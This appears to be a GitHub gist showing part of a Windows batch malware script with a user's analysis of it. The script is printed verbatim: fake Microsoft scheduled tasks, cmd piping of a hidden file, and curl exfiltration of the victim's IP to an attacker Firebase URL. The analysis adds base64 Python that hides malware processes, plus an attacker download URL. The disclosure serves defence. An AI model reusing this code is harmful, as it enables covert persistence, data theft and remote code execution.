echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp7.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp7.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp7.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp7.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp7.xml | |
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp7.xml | |
echo ^<URI^>\Microsoft\Windows\Shell\ObjectTask^</URI^> >> C:\systemfile\temp7.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp7.xml | |
echo ^<Triggers^> >> C:\systemfile\temp7.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp7.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml | |
echo ^<Delay^>PT7S^</Delay^> >> C:\systemfile\temp7.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp7.xml | |
echo ^</Triggers^> >> C:\systemfile\temp7.xml | |
echo ^<Principals^> >> C:\systemfile\temp7.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp7.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp7.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp7.xml | |
echo ^</Principal^> >> C:\systemfile\temp7.xml | |
echo ^</Principals^> >> C:\systemfile\temp7.xml | |
echo ^<Settings^> >> C:\systemfile\temp7.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp7.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp7.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp7.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp7.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp7.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp7.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp7.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp7.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp7.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp7.xml | |
echo ^</Settings^> >> C:\systemfile\temp7.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp7.xml | |
echo ^<Exec^> >> C:\systemfile\temp7.xml | |
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp7.xml | |
echo ^<Arguments^>/c if exist ^%temp^%\c4329f-4b8b33e-fa4fffe0 (SCHTASKS /End /TN ^"\Microsoft\Windows\AppID\VerifiedCert^" ^& SCHTASKS /End /TN ^"\Microsoft\Windows\Application Experience\Maintenance^" ^& schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /DISABLE ^& schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /DISABLE ^& schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /ENABLE ^& schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /ENABLE)^</Arguments^> >> C:\systemfile\temp7.xml | |
echo ^</Exec^> >> C:\systemfile\temp7.xml | |
echo ^</Actions^> >> C:\systemfile\temp7.xml | |
echo ^</Task^> >> C:\systemfile\temp7.xml | |
schtasks /create /xml "C:\systemfile\temp7.xml" /tn "\Microsoft\Windows\Shell\ObjectTask" /F | |
Del "C:\systemfile\temp7.xml" | |
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp8.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp8.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp8.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp8.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp8.xml | |
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp8.xml | |
echo ^<URI^>\Microsoft\Windows\Clip\ServiceCleanup^</URI^> >> C:\systemfile\temp8.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp8.xml | |
echo ^<Triggers^> >> C:\systemfile\temp8.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp8.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml | |
echo ^<Delay^>PT5M^</Delay^> >> C:\systemfile\temp8.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp8.xml | |
echo ^</Triggers^> >> C:\systemfile\temp8.xml | |
echo ^<Principals^> >> C:\systemfile\temp8.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp8.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp8.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp8.xml | |
echo ^</Principal^> >> C:\systemfile\temp8.xml | |
echo ^</Principals^> >> C:\systemfile\temp8.xml | |
echo ^<Settings^> >> C:\systemfile\temp8.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp8.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp8.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp8.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp8.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp8.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp8.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp8.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp8.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp8.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp8.xml | |
echo ^</Settings^> >> C:\systemfile\temp8.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp8.xml | |
echo ^<Exec^> >> C:\systemfile\temp8.xml | |
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp8.xml | |
echo ^<Arguments^>/c more "C:\systemfile\c.z" ^| cmd ^& if EXIST "C:\Windows\security\pywinvera\libs" (schtasks /delete /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F)^</Arguments^> >> C:\systemfile\temp8.xml | |
echo ^</Exec^> >> C:\systemfile\temp8.xml | |
echo ^</Actions^> >> C:\systemfile\temp8.xml | |
echo ^</Task^> >> C:\systemfile\temp8.xml | |
schtasks /create /xml "C:\systemfile\temp8.xml" /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F | |
Del "C:\systemfile\temp8.xml" | |
FOR /F "tokens=*" %a in ('curl.exe -L http://ip-api.com/json') do SET widget=%a | |
set widget=%widget:"=\"% | |
set widget=%widget: =_% | |
echo %widget% | |
curl.exe -X POST -d "%widget%" https://ping-newdatabase-default-rtdb.firebaseio.com/Userinfo.json | |
sc.exe stop wuauserv | |
sc.exe config wuauserv start=demand | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Most of Stage 3 defines 8 tasks in "Task Scheduler". I've put the other stuff at the top here, Even though some tasks are defined in earlier lines.
Line 1 kills this script instantly if your WinSystemLocale does not start with "en-".
Lines 5-6 make a directory called
C:\systemfile
and hide it. You can still open it by hitting "Win + R" and entering "C:\systemfile
". The files inside are also hidden.Lines 148-193 create 3 files inside
C:\systemfile
Lines 357-359 make sure that
curl
is available. From the attackers repo, but clean as of now.Lines 596-603 send the users IP to the attacker's firebase. It's safe to run 596-600 locally to see the data that you sent. It includes IP, and an approximate location down to city and ZIP code.
Line 608/609 stops wuauserv (= Windows Update Service) and sets it to start only manually. This seems to actually be the default. But you can start it by running
sc.exe start wuauserv
and set it to start on its own by selecting an option from<boot|system|auto|demand|disabled|delayed-auto>
and runningsc.exe config wuauserv start=<your option>
Tasks
Task 1 (lines 14-63): \Microsoft\Windows\AppID\VerifiedCert
This is run inside
C:\systemfile
.This Task seems to execute what's inside
C:\systemfile\c.z
and then%USERPROFILE%\Downloads\c.z
?Is it common to pipe
more
intocmd
?Task 2 (lines 75-132): \Microsoft\Windows\Application Experience\Maintenance
This tries to find the path to Chrome, Brave or Edge and then calls it with the following arguments:
This is run inside
C:\systemfile
This runs a browser. With the user data in
C:\systemfile
. Probably hidden? Haven't checked the flags all out yet.--tyqe=render
mistype of--type=render
. Probably mistyped on purpose to look like it is being rendered.--fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072
should be--field-trial-handle
(fieLd and only one dash). This looks like what Google sometimes does to enable different "Field Trials". Probably also mistyped on purpose.--lang=en-US
sets language to American English--extension--process
Marks a renderer as extension process--origin--trial-disabled--features=SecurePaymentConfirmation
Disables origin trials for SecurePaymentConfirmation--device-scale--factor=1
should be--force-device-scale-factor=1
sets scaling of the UI.--num--raster-threads=2
use two threads.--profile-directory=Default
useDefault
profile directory--enable--main-frame-before--activation www.google.com
--renderer--client-id=6
??--user-data-dir="C:\systemfile"
overwrite user data directory.--no-v8--untrusted-code-mitigations
To do with this (?)--load-extension="C:\systemfile"
Load the malicious extension fromC:\systemfile
--mojo--platform-channel-handle=-3784
"In this mode, Chrome binds an Application request and can then connect to the “pure” Mojo services running in the shell around it." (?)/prefetch:1
doesn't really do anythingTask 3 (lines 233-273): \Microsoft\Windows\Services\CertPathCheck
python -c "import base64;exec(base64.b64decode('aW1wb3J0IG9zLCBiYXNlNjQKIApTdHIgPSBsaXN0KG9wZW4oIkM6XFxzeXN0ZW1maWxlXFxvYnMubG9nIiwgbW9kZT0iciIsIGVuY29kaW5nPSJ1dGYtOCIpLnJlYWQoKS5yZXBsYWNlKCJcbiIsICIiKSkgCmZvciB4IGluIHJhbmdlKGxlbihTdHIpKToKICAgIFN0clt4XSA9IGNocihvcmQoU3RyW3hdKSAtIDEpIAogCmV4ZWMoYmFzZTY0LmI2NGRlY29kZSgiIi5qb2luKFN0cikpKQpvcy5wb3Blbignc2NodGFza3MgL2VuZCAvdG4gXE1pY3Jvc29mdFxXaW5kb3dzXFNlcnZpY2VzXENlcnRQYXRodycpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))"
This is run inside
C:\Windows\security\pywinvera
Decoded:
Reads
obs.log
, does a b64 decode and executes it. It stops Task 4 and kills browser chrome and other processes running with session 0 ("user-less").Task 4 (lines 279-319): also \Microsoft\Windows\Services\CertPathw
pythonw -c "import base64;exec(base64.b64decode('aW1wb3J0IGF1dG9pdCwgb3MKYXV0b2l0LmF1dG9faXRfc2V0X29wdGlvbigiV2luV2FpdERlbGF5IiwgMCkKYXV0b2l0Lndpbl93YWl0KCdbUkVHRVhQVElUTEU6KD9pKSguKlByb2Nlc3MgRXhwbG9yZXIuKnwuKlRhc2sgTWFuYWdlci4qfC4qU3lzdGVtIEV4cGxvcmVyLip8LipQcm9jZXNzIEhhY2tlci4qfC4qQW5WaXIgVGFzay4qfC4qV2luVXRpbGl0aWVzLiopXScpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))"
This is run inside
C:\Windows\security\pywinvera
This script waits until the Task Manager or similar tool is started and then kills the hidden processes to hide them from the user.
Task 5 (lines 365-410): /Microsoft/Windows/Servicing/ComponentCleanup
cmd curl https://autobat[.]alexrybak0444[.]workers[.]dev/ -o %temp%\c4329f-4b8b33e-fa4fffe0
Download file from site and put it into
%temp%\c4329f-4b8b33e-fa4fffe0
.As of right now this file only contains the placeholder text
asd
.Task 6 (lines 419-465): /Microsoft/Windows/Servicing/ServiceCleanup
Runs the script downloaded in Task 5, then deletes it.
Task 7 (lines 478-520): /Microsoft/Windows/Shell/ObjectTask
If the file downloaded in Task 5 exists, it stops Task 1 and Task 2, disables them and then enables them again.
Task 8 (lines 535-577): /Microsoft/Windows/Clip/ServiceCleanup
Runs the contents of
C:\systemfile\c.z
and deletes Task this task ifC:\Windows\security\pywinvera\libs
exists.